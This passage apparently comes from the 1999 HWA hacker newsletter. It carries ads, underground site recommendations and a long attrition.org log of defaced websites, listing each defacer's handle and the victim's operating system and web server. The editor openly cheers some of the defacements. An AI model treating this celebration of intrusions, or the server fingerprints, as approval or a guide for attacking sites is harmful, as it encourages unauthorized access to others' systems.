* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
When people ask you "Who is Kevin Mitnick?" do you have an answer?
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
http://www.2600.com/ http://www.kevinmitnick.com
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* http://www.csoft.net" One of our sponsers, visit them now www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
// or cruciphux@dok.org //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! ............c'mon, you KNOW you
wanna...yeah you do...make it fresh and new...be famous...<sic>
SITE.1
Sometimes we have zip sometimes we have lots....here's some sites to check out
http://www.yaromat.com/macos8/index.htm
Cool site, not security related but has a neat effect, 'converts your windows
9x box to MacOS8' - use Netscape for best results. - Duro
http://www.hack.co.za
Recently updated with new sections, check it out.
http://www.sentinel.dircon.co.uk/
Good H/P/A site with lots of older texts and a good layout. Check it out...
http://www.pfuca.com/products/hhkb/
The 'hackers' keyboard, this keyboard is a small footprint, multi-os compatible
keyboard, check it out... - Ed
http://www.piratecity.com/rules.htm
Free underground website hosting, 20MB free, soon to have email ala hotmail
too soon, check this site out if you want to run a site and are sick of the
usual free provider restrictions.
Rules:
Our Simple Terms and Conditions
NO WAREZ (pirate software) CAN BE ACTUALLY STORED ON OUR SERVERS but you can have
links to warez stored elsewhere. This is because of bandwidth concerns.
NO ADULT MATERIAL WHATSOEVER WILL BE TOLERATED. Please find a FREE adult website
provider for such material there are many out there.
NO SPAMMING! If you spam we will terminate your account immediately and notify
your ISP.
NO manipulation of our advertising banner or link and . This pays for your free
webspace and the work that goes into Piratecity.com
NO using your site as a storage site for another site or passwording your site.
NO normal mundane sites, go to Fortunecity.com for that kind of stuff!
That�s it.
-=-s
http://www.nethersearch.com/
Underground search portal with a lot of local content too, well worth checking
out HWA is also mirrored there, and a lot of decent tutorials and the like can
be found within this site. Check her out.
http://www.bigbrotherinside.com/
Privacy advocates speak out about the branding of all PIII chips with a software
recoverable id code embedded in all PIII chips, sure you can turn it off with
software but be warned it can also be turned on again remotely without your
knowledge, check this site out for more details. (See section 30.0 too)
- Repluzer
http://www.bugnet.com/
First off, Its pay which sucks. Secondly this site is a teaser with some 'free'
bug alerts, and hacks, synopsis: subscribe to BUGTRAQ and visit Security Focus
instead. - sAs-
http://www.ussrback.com/
Security services website, offers many homegrown advisories and current
exploits. Nasty background is kinda hard on the eyes but otherwise a nice
layout and full of good info, watch for lots of stuff from this site in
here. - Ed
You can Send in submissions for this section too if you've found
(or RUN) a cool site...
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
___| _ \ |
| __| _` |\ \ / | | __| _ \ _` |
| | ( | ` < | | | __/ ( |
\____|_| \__,_| _/\_\\___/ _| \___|\__,_|
Note: The hacked site reports stay, especially wsith some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as the
channel name, others aren't so obvious but do exist.
>Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
* Info supplied by the attrition.org mailing list.
Defaced domain: www.koko.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.koko.gov.my
Defaced by: nugz
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.clubber.co.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.clubber.co.uk
Defaced by: ContrOl-C
Operating System: BSDI 4.0 (Apache 1.3.1.1)
Defaced domain: www.pure-elite.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.pure-elite.com
Defaced by: Sabu
Operating System: Solaris 2.6 - 2.7 (Apache 1.3.6)
Defaced domain: www.intelcities.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.intelcities.com
Defaced by: HiP
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.altavista.software.digital.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.altavista.software.digital.com
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.acerperipherals.co
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.acerperipherals.com
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: secure.wavetech.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/secure.wavetech.com
Defaced by: Uneek Tech
Operating System: Windows NT
Defaced domain: shadow.fnn.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/shadow.fnn.net
Defaced by: fl13s cr3w
Operating System: Linux (Apache 1.1.3)
Defaced domain: www.record.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.record.org
Defaced by: w0lf
Operating System: Irix (Rapidsite/Apa-1.3.4)
Defaced domain: www.waterworld.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.waterworld.com
Defaced by: globher
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.chicks.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.chicks.net
Defaced by: h4p
Operating System: Linux (Red Hat) (Apache 1.3.9)
Defaced domain: sac.prodam.sp.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/sac.prodam.sp.gov.br
Defaced by: globher
Operating System: Windows NT(IIS/4.0)
Defaced domain: www.lickass.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.lickass.net
Defaced by: cowhead2000
Operating System: Linux
Defaced domain: www.fesp.rj.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.fesp.rj.gov.br
Defaced by: globher
Operating System: Windows NT
Defaced domain: www.sample.burst.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.sample.burst.n
Defaced by: bansh33
Operating System: Linux (Apache 1.3.9, PHP/mod_frontpage/mod_ssl)
Defaced domain: www.igrejauniversal.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.igrejauniversal.com.br
Operating System: Linux (Apache 1.2.4)
Defaced domain: fanta.me.uiuc.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/fanta.me.uiuc.edu
Defaced by: tonekore
Operating System: Linux (Red Hat) (Apache 1.3.6)
Defaced domain: shadow.fnn.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/shadow.fnn.net
Operating System: Linux (Apache 1.1.3)
Defaced domain: 198.116.6.52
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/198.116.6.52
Defaced by: dap
Operating System: RedHat Linux (Apache 1.3.6)
Defaced domain: www.guardtech.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.guardtech.com
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
Defaced domain: helpchat.worldnet.att.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/helpchat.worldnet.att
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: www.statssa.gov.za
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.statssa.gov.za
Defaced by: globher
Operating System: Windows NT
Defaced domain: www.mcdonalds.com.au
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.mcdonalds.com.au
Defaced by: dukj
Operating System: Windows NT
Defaced domain: www.fsiferreira.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.fsiferreira.com
Defaced by: dap
Operating System: Linux
Defaced domain: www.gcpr.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.gcpr.org
Defaced by: rackmount
Operating System: Windows NT
Defaced domain: ntwww.ansys.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/ntwww.ansys.com
Defaced by: rackmount
Operating System: Windows NT
Defaced domain: www.ofcm.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.ofcm.gov
Defaced by: rackmount
Operating System: Window NT
Defaced domain: www.gcpr.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.gcpr.org
Defaced by: rackmount
Operating System: Windows NT
Defaced domain: www.aiwa.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.aiwa.com
Defaced by: rackmount
Operating System: Windows NT
Defaced domain: www.willieesco.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.willieesco.com
Defaced by: h4x0ring f0r swedish grlz
Operating System: Linux
Defaced domain: beta.millicent.digital.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/beta.millicent.digital.com
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.wings.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.wings.com
Defaced by: sSh
Operating System: Windows NT
Defaced domain: www.apptech-cc.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.apptech-cc.com
Defaced by: Digital Domination
Operating System: Digital Unix
Defaced domain: www.crystaltips.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.crystaltips.com
Defaced by: bansh33
Operating System: Linux
Defaced domain: www.melissa.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.melissa.com
Defaced by: p4riah
Operating System: Solaris (Apache 1.3.3)
Defaced domain: boubakar.cit.nih.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/boubakar.cit.nih.gov
Defaced by: max
Operating System: Linux
Defaced domain: www-curator.jsc.nasa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www-curator.jsc.nasa.gov
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: www.cyoc.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.cyoc.org
Defaced by: weLLfare
Operating System: Solaris
Defaced domain: aabea.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/aabea.org
Defaced by: BreAc0n
Operating System: Red Hat Linux
Defaced domain: www.mute300.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.mute300.net
Defaced by: Sabu
Operating System: FreeBSD
Defaced domain: www.tcs.com.sg
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.tcs.com.sg
Defaced by: Sarin
Operating System: Windows NT
Defaced domain: www.dare.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.dare.com
Defaced by: Coolio
Operating System: Irix
Defaced domain: n1-3-6.irt.drexel.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/n1-3-6.irt.drexel.edu
Defaced by: sSh
Operating System: Windows NT
Defaced domain: www.babybook.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.babybook.net
Defaced by: globher
Operating System: Windows NT
Defaced domain: www.hershey.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.hershey.com
Defaced by: Sesame Street Hackers (sSh)
Operating System: Windows NT
Defaced domain: www.mcdonalds.com.au
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.mcdonalds.com.au
Defaced by: globher
Operating System: Windows NT
Defaced domain: www.webspawn.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.webspawn.com
Operating System: BSDI
Defaced domain: redskin.dap.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/redskin.dap.ch
Defaced by: Sesame Street Hax0rz
Operating System: Red Hat Linux
Defaced domain: www.cvm.tamu.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.cvm.tamu.edu
Defaced by: sSh
Operating System: Windows NTY
Defaced domain: www.aceralliance.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.aceralliance.com
Defaced by: Sesame Street Hax0rz
Operating System: Windows NT
Defaced domain: www.phe.queensu.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.phe.queensu.ca
Operating System: Linux
Defaced domain: www.phoenixcomms.com.sg
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.phoenixcomms.com.sg
Defaced by: un33k t3ch
Operating System: Windows NT (IIS/3.0)
Defaced domain: www.chicks.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.chicks.net
Defaced by: unknown
Operating System: Linux (Red Hat) (Apache 1.3.9)
Defaced domain: www.dcrt.nih.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.dcrt.nih.gov
Defaced by: h2Vk
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.dcrt.nih.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.dcrt.nih.gov
Defaced by: h2Vk
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.aar.tc.faa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.aar.tc.faa.gov
Defaced by: sSh
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.ohio.doe.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.ohio.doe.gov
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.gc.doe.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.gc.doe.gov
Defaced by: h2Vk
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.gc.doe.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.gc.doe.gov
Defaced by: globher
Operating System: Windows NT
Defaced domain: www.igrejauniversal.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.igrejauniversal.com.br
Defaced by: Maverick
Operating System: Linux
Defaced domain: abacus.mc.duke.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/abacus.mc.duke.edu
Defaced by: Verb0
Operating System: Windows NT
Defaced domain: www.oarhq.noaa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.oarhq.noaa.gov
Defaced by: Sesame Street Hax0rz
Operating System: Windows NT
Defaced domain: www.monica-lewinsky.org (yeah yet again)
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.monica-lewinsky.org
Defaced by: ne0h
Operating System: BSDI
Defaced domain: www.theblue.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.theblue.net
Defaced by: knell
Operating System: Linux
Defaced domain: www.fesp.rj.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.fesp.rj.gov.br
Defaced by: p4riah
Operating System: WIndows NT
Defaced domain: www.waterworld.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.waterworld.com
Defaced by: p4riah
Operating System: Windows NT
Defaced domain: seb.ce.gatech.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/seb.ce.gatech.edu
Defaced by: spinkus
Operating System: Solaris
Defaced domain: assinet.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/assinet.com
Defaced by: twd
Operating System: Windows NT
Defaced domain: www.svic.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.svic.net
Defaced by: twd
Operating System: Windows NT
Defaced domain: stinkdog.bidmc.harvard.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/stinkdog.bidmc.harvard.edu
Operating System: Red Hat Linux
Defaced domain: www.congruentsoft.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.congruentsoft.com
Defaced by: twd
Operating System: Windows NT (IIS/4.0)
Defaced domain: netcommerce.com.sg
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/netcommerce.com.sg
Defaced by: twd
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.spykee.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.spykee.com
Operating System: OpenBSD 2.4 (Apache 1.3.9)
Defaced domain: www.ssp.df.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.ssp.df.gov.br
Defaced by: JLM
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.firebat.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.firebat.net
Defaced by: Sabu and Six
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.muis.gov.sg
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.muis.gov.sg
Defaced by: Sarin
Operating System: Windows NT (IIS/4.0)
Defaced domain: registry.faa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/registry.faa.gov
Defaced by: sSh
Operating System: Windows NT (IIS/4.0)
Defaced domain: atsy2k.faa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/atsy2k.faa.gov
Defaced by: sSh
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.teamdawghouse.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.teamdawghouse.com
Defaced by: Sabu
Operating System: Linux (Apache 1.3.4)
Defaced domain: www.learncomm.org
Site Title: Kiel Woodward Associates
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.learncomm.org
Defaced by: ieet
Operating System: Irix (Rapidsite/Apa-1.3.4)
Defaced domain: www.ssp.df.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.ssp.df.gov.br
Defaced by: Fuby
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.facsfinancial.com
Site Title: Facs Financial
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.facsfinancial.com
Defaced by: sSh
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.whiterules.com
Site Title: White Rules
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.whiterules.com
Defaced by: TWHA
Operating System: Linux (Apache 1.3.3)
Defaced domain: www.hawgparts.com
Site Title: P and S Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.hawgparts.com
Defaced by: Devil-C
Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6)
There are hidden comments in the HTML.
Defaced domain: www.sect.mg.gov.br
Site Title: Secretaria de Estado de Ci�ncia e Tecnologia de Minas Gerais
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.sect.mg.gov.br
Defaced by: globher
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.senado-ba.gov.ar
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.senado-ba.gov.ar
Defaced by: c0rvus
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.citizens-bank-nm.com
Site Title: Citizens Bank
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.citizens-bank-nm.com
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.moscow-bank.ru
Site Title: Moscow Bank
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.moscow-bank.ru
Defaced by: dukj
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.pobis.net
Site Title: ASIA INFORMATION NETWORK
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.pobis.net
Defaced by: Darkness
Operating System: Linux (Apache 1.1.1)
Defaced domain: wayland.k12.mi.us
Site Title: Wayland K12 School (MI)
Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/wayland.k12.mi.us
Defaced by: Darkness
Operating System: Red Hat Linux (Apache 1.3.6)
Defaced domain: www.caloritec.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.caloritec.ch
Defaced by: xhostile & acidklown
Operating System: Windows NT (Elogia Web Server/1.0)
Defaced domain: www.markowitzmail.com
Site Title: Markowitz Mall
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.markowitzmail.com
Defaced by: sSh
Operating System: Red Hat Linux (Apache 1.3.6)
Defaced domain: www.pathword.com
Site Title: Roger Solioz (PATHWORD-DOM)
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.pathword.com
Defaced by: xhostile & acidklown
Operating System: Windows NT (Elogia Web Server/1.0)
Defaced domain: www.cornu.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.cornu.ch
Defaced by: xhostile & acidklown
Operating System: Windows NT (Elogia Web Server/1.0)
Defaced domain: www.moneytopics.com
Site Title: IPM
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.moneytopics.com
Defaced by: xhostile & acidklown
Operating System: Windows NT (Elogia Web Server/1.0)
Defaced domain: www.techtravel.ch
Site Title: Tech Travel (CH)
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.techtravel.ch
Defaced by: xhostile & acidklown
Operating System: Windows NT (Elogia Web Server/1.0)
Defaced domain: www.socialinfo.ch
Site Title: Social Info (CH)
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.socialinfo.ch
Defaced by: xhostile & acidklown
Operating System: Windows NT (Elogia Web Server/1.0)
Defaced domain: www.duqpart.com
Site Title: Duquette & Partners, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.duqpart.com
Defaced by: sSh
Operating System: Linux (Apache 1.3.4)
Defaced domain: www.focal.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.focal.ch
Defaced by: xhostile & acidklown
Operating System: Windows NT (Elogia Web Server/1.0)
Defaced domain: www.fullfat.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.fullfat.
Defaced by: xhostile & acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
domain: www.fifo.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.fifo.ch
Defaced by: xhostile & acidklown
Operating System: Windows NT (Elogia Web Server/1.0)
Defaced domain: www.cybergribouille.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.cybergribouille.ch
Defaced by: acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
Defaced domain: www.wnym.com
Site Title: Western New York Microcomputer, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.wnym.com
Defaced by: sSh
Operating System: Linux (Apache 1.3.4)
Defaced domain: www.ultramongolia.com
Site Title: UltraMongolia
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.ultramongolia.com
Defaced by: xhostile & acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
Defaced domain: www.swisscentershanghai.com
Site Title: SINOPTIC
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.swisscentershanghai.com
Defaced by: acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
Defaced domain: dogwizard.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/dogwizard.com
Defaced by: CodeZero
Operating System: Linux (Apache 1.3.6)
There are hidden comments in the HTML.
Defaced domain: www.sinoptic.ch
Site Title: Sinoptic
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.sinoptic.ch
Defaced by: acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
Defaced domain: www.medtechnet.com
Site Title: Med TechNet Online Information Services
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.medtechnet.com
Defaced by: sSh
Operating System: Linux (Apache 1.3.4)
Defaced domain: www.siavd.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.siavd.ch
Defaced by: acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
Defaced domain: www.digitoner.ch
Site Title: DigiToner (CH)
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.digitoner.ch
Defaced by: acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
Defaced domain: www.ipem.mg.gov.br
Site Title: Instituto de Pesos e Medidas do Estado de Minas Gerais
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.ipem.mg.gov.br
Defaced by: globher
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.guixe.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.guixe.com
Defaced by: acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
Defaced domain: www.iug.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.iug.ch
Defaced by: acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
Defaced domain: www.sis-china.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.sis-china.ch
Defaced by: acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
Defaced domain: www.reymondsa.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.reymondsa.ch
Defaced by: acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
Defaced domain: www.centovisi.ch
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.centovisi.ch
Defaced by: acidklown
Operating System: Windows NT (Elogia Web Server 1.0)
Defaced domain: meetingout.senate.gov
Mirror:
http://www.attrition.org/mirror/attrition/1999/11/17/meetingout.senate.gov
Defaced by: sSh
Operating System: NT
Defaced domain: wsg6.ngdc.noaa.gov
Site Title: National Oceanic and Atmospheric Administration
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/wsg6.ngdc.noaa.gov
Defaced by: Spykee
Operating System: Red Hat Linux (Apache 1.3.6)
Defaced domain: www.csc-ing.com
Site Title: Computer Sciences Corporation
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.csc-ing.com
Defaced by: dagger
Operating System: Windows NT (IIS/4.0)
Defaced domain: crack.neurobio.ucla.edu
Site Title: University of California, Los Angeles
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/crack.neurobio.ucla.edu
Defaced by: spykee
Operating System: Red Hat Linux (Apache 1.3.3)
Defaced domain: bing.ngdc.noaa.gov
Site Title: National Oceanic and Atmospheric Administration
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/bing.ngdc.noaa.gov
Defaced by: Spykee
Operating System: Red Hat Linux (Apache 1.3.6)
Defaced domain: www.jrtc-polk.army.mil
Site Title: Joint Readiness Training Centre & Fort Polk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.jrtc-polk.army.mil
Defaced by: Pakistan Hackerz Club
Operating System: Windows NT
Defaced domain: www.comunidadebr.com.br
Site Title: Comunidade Brazil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.comunidadebr.com.br
Defaced by: globher
Operating System: Windows NT
Defaced domain: wwwnhc.nhmccd.cc.tx.us
Site Title: North Harris College
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/wwwnhc.nhmccd.cc.tx.us
Defaced by: sect0r
Operating System: Windows NT
Defaced domain: www.lic.gov.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.lic.gov.uk
Defaced by: Kryptek
Operating System: Solaris (Apache 1.2.4)
Defaced domain: gw.fresno.gov
Site Title: City of Fresno Gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/gw.fresno.gov
Defaced by: globher
Operating System: Windows NT (IIS/4.0)
URL: www.brick.net
Defaced domain: www.brick.net
Site Title: Loopback Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.brick.net
Defaced by: cesar
Operating System: BSDI 3.0 (Apache 1.3.9)
URL: www.afree.net
Defaced domain: www.afree.net
Site Title: A Free Net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.afree.net
Operating System: BSDI 3.0 (Apache 1.3.9)
URL: intra-cas.faa.gov
Defaced domain: intra-cas.faa.gov
Site Title: Federal Aviation Administration
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/intra-cas.faa.gov
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
URL: smagazine.simplenet.com
Defaced domain: smagazine.simplenet.com
Site Title: Simple Network Communications
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/smagazine.simplenet.com
Operating System: Solaris (Apache 1.3.9)
URL: www.nekipo.ee
Defaced domain: www.nekipo.ee
